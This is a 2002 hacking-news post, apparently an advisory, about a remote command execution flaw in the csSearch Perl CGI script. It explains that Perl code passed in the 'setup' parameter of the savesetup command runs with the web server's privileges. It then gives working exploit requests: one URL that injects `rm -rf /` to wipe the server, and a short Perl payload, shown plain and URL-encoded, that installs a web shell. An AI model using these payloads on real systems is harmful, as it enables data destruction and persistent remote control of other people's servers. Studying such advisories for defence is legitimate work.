Users login

Create an account »

JOIN XATRIX

Users login

Home » Hacking News » CSSearch Remote Command Execution Vulnerability

CSSearch Remote Command Execution Vulnerability

by Nikola Strahija on March 28th, 2002 csSearch is a website search script, written in Perl. It will run on most Unix and Linux variants, as well as Microsoft operating systems. csSearch is prone to an issue which may enable an attacker to execute Perl code with the privileges of the webserver process.


For exploitation to be successful, the attacker must pass properly URL encoded Perl code in CGI parameters via a web request. For example:

http://host/cgi-bin/csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE

Remote: Yes

Exploit: The following example was submitted:

Configuration data is saved with the following URL.
Note that any perl code would need to be URL encoded.

csSearch.cgi?command=savesetup&setup=PERL_CODE_HERE

For example, the classic "rm -rf /" example would be
as follows:

csSearch.cgi?command=savesetup&setup=`rm%20-rf%20/`

Here's something a little more interesting, less than
300 bytes of code that turns csSearch into a remote
web shell of sorts.

*ShowSearchForm = *Login = sub {
print "Enter
Command (eg: ls -l)";
print " ";
print "";
$in{'cmd'} && print `$in{'cmd'} 2>&1`;
exit;
};

URL Encoded as:

csSearch.cgi?command=savesetup&setup=*ShowSearchForm%3D*Login%3Dsub{print"Enter+Comm
and+(example:+ls+-l)+";$in{'cmd'}%26
%26print`$in{'cmd'}+2>%261`;exit;};




Newsletter signup

Signup to our monthly newsletter and stay in touch with IT news!

Free E-books

We've got ebooks! But they're not online. :( Please give us a few days to bring downloads back.

Contact

Have something to say or just wanna drop us a line? Please keep this in mind: to spam, we reply with spam.

Contact us »